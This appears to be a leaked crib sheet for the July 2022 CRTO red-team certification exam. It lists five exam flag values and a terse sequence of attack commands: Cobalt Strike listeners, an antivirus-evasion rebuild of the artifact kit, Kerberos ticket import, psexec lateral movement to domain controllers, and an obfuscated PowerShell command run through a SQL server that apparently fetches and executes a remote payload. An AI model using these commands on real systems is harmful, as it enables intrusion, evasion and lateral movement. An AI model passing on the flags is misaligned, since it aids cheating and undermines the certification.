CRTO July2022 6flags
CRTO July2022 6flags
FLAG 2 - eb37d7b24ae6d4640558304db2b23099
FLAG 3- ec05148d3a2e0f3b044b4573cb84674e
FLAG 4- d302622334f652167456d17fa0596cff
FLAG 5- 9dfe6f3301f3a3f3660f21878e7b6d9f
FLAG 6- 9636a983e927a4fa950f58759cc34912
Cd /opt/cobaltstrike
CREATE LISTENER –
3 listeners
1- HTTP 80
2- SMB 445 -- FOR LATERAL MOVEMENT.
3- TCP_LOCAL 1337
Starting the first instance.
Cmd.exe /c .\gethere.exe
EDIT bypass-pipe.c
open build.sh
ADD # infront of build_Artifcacts.
Run build.sh
TO CHECK IF ALL THE CHANGES ARE CORRECT OR NOT RUN A THREAT CHECK
Visit – C:\Tools\Cobaltstrike\artifact-kit]dist-pipe
C:\Tools\ThreatCheck\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f
artifact64svcbig.exe
upload C:\Payloads\RTO.exe
Svc_test *
Interact with svc-test
Run whoami
Flag 2 –
PS C:\Users\Administrator> [System.IO.File]::WriteAllBytes("C:\Payloads\srv.kirbi",
[System.Convert]::FromBase64String(" PASTE THE TICKET)
beacon> ls \\srv.child.rto.local\c$
PS C:\Users\Administrator> [System.IO.File]::WriteAllBytes("C:\Payloads\dc2.kirbi",
[System.Convert]::FromBase64String(" TICKET VALUE”)
beacon> ls \\dc-2\c$\
beacon> jump psexec64 dc-2 smb
ec05148d3a2e0f3b044b4573cb84674e
GET FLAG
FLAG 3.TXT - ec05148d3a2e0f3b044b4573cb84674e
beacon> ls \\dc-1.rto.local\c$\
FLAG4.TXT - d302622334f652167456d17fa0596cff
FLAG 5-
INJECT NOTEPAD.EXE
beacon> run netsh advfirewall add rule name="Allow 4444" dir=in action=allow
protocol=TCP localport=4444
beacon> run netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow
protocol=TCP localport=4444
beacon> powerpick Invoke-SQLOSCmd -Instance sql.rto.local -Command 'powershell -w
hidden -enc
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlA
GIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4
AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMgAuADIAM
AA0ADoAOAAwADgAMAAvAHMAJwApACkA' -RawResult
beacon> run netsh advfirewall firewall add rule name="Allow 8080" dir=in action=allow
protocol=TCP localport=8080
beacon> run netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow
protocol=TCP localport=4444
FLAG 6-
flag 6 - 9636a983e927a4fa950f58759cc34912
in the powershell –
enter